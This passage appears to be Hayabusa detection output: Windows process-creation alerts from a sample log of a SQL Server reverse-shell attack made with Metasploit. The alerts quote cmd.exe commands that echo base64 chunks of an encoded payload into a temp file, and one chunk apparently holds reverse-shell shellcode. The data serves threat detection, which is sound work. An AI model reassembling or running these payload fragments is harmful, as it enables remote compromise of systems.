x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde
7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: 
C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: 
C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command 
Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgI
CAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aW9uLCB0aGUgYXR0cmlidXRlcwoAAAAAAAAAICAgICAgICAgICAgICAgICAgICBJbnNlcnRlZCBhZnRlciBhbGwgbm9ybWFsIGhlYWRlciBsaW5lcy4gKHJlcGVhdGFibGUpCgAAAAAAAAAgICAgLUggYXR0cmlidXRlICAgIEFkZCBBcmJpdHJhcnkgaGVhZGVyIGxpbmUsIGVnLiAnQWNjZXB0LUVuY29kaW5nOiBnemlwJwoAAAAAACAgICAtQyBhdHRyaWJ1dGUgICAgQWRkIGNvb2tpZSwgZWcuICdBcGFjaGU9MTIzNC4gKHJlcGVhdGFibGUpCgAgICAgLXogYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGQgb3IgdGggYXR0cmlidXRlcwoAAAAAICAgIC15IGF0dHJpYnV0ZXMgICBTdHJpbmcgdG8gaW5zZXJ0IGFzIHRyIGF0dHJpYnV0ZXMKAAAgICAgLXggYXR0cmlidXRlcyAgIFN0cmluZyB0byBpbnNlcnQgYXMgdGFibGUgYXR0cmlidXRlcwoAAAAgICAgLWkgICAgICAgICAgICAgIFVzZSBIRUFEIGluc3RlYWQgb2YgR0VUCgAAAAAgICAgLXcgICAgICAgICAgICAgIFByaW50IG91dCByZXN1bHRzIGluIEhUTUwgdGFibGVzCgAAACAgICAtdiB2ZXJib3NpdHkgICAgSG93IG11Y2ggdHJvdWJsZXNob290aW5nIGluZm8gdG8gcHJpbnQKACAgICAgICAgICAgICAgICAgICAgRGVmYXVsdCBpcyAndGV4dC9wbGFpbicKAAAAACAgICAgICAgICAgICAgICAgICAgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKAAAAACAgICAtVCBjb250ZW50LXR5cGUgQ29udGVudC10eXBlIGhlYWRlciBmb3IgUE9TVGluZywgZWcuCgAAACAgICAtdSBwdXRmaWxlICAgICAgRmlsZSBjb250YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAAAAAAAAAICAgIC1wIHBvc3RmaWxlICAgICBGaWxlIGNvbnRhaW5pbmcgZGF0YSB0byBQT1NULiBSZW1lbWJlciBhbHNvIHRvIHNldCAtVAoAACAgICAtYiB3aW5kb3dzaXplICAgU2l6ZSBvZiBUQ1Agc2VuZC9yZWNlaXZlIGJ1ZmZlciwgaW4gYnl0ZXMKAAAgICAgLXQgdGltZWxpbWl0ICAgIFNlY29uZHMgdG8gbWF4LiB3YWl0IGZvciByZXNwb25zZXMKACAgICAtYyBjb25jdXJyZW5jeSAgTnVtYmVyIG9mI
G11bHRpcGxlIHJlcXVlc3RzIHRvIG1ha2UKAAAAACAgICAtbiBy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: 